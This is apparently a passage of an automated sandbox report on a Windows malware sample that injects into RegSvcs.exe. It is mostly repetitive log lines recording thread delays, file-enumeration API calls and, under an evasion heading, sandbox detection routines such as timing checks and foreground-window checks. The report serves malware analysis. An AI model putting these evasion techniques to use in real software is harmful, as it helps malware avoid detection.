              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\PsBygexGwH.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99308
              Source: C:\Users\user\AppData\Local\directory\name.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002CD010 rdtsc 6_2_002CD010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599721Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599266Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594279Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594158Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597262Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595951Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594830Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1835Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7995Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8620Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1231Jump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeAPI coverage: 4.0 %
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.2 %
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0018DBBE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001968EE FindFirstFileW,FindClose,0_2_001968EE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0019698F
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0018D076
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0018D3A9
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00199642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00199642
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019979D
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00199B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00199B2B
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00195C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00195C97
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0032DBBE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003368EE FindFirstFileW,FindClose,6_2_003368EE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_0033698F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0032D076
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0032D3A9
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00339642
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0033979D
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00339B2B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00335C97
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001242DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599844Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599721Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599266Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594279Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594158Jump to behavior
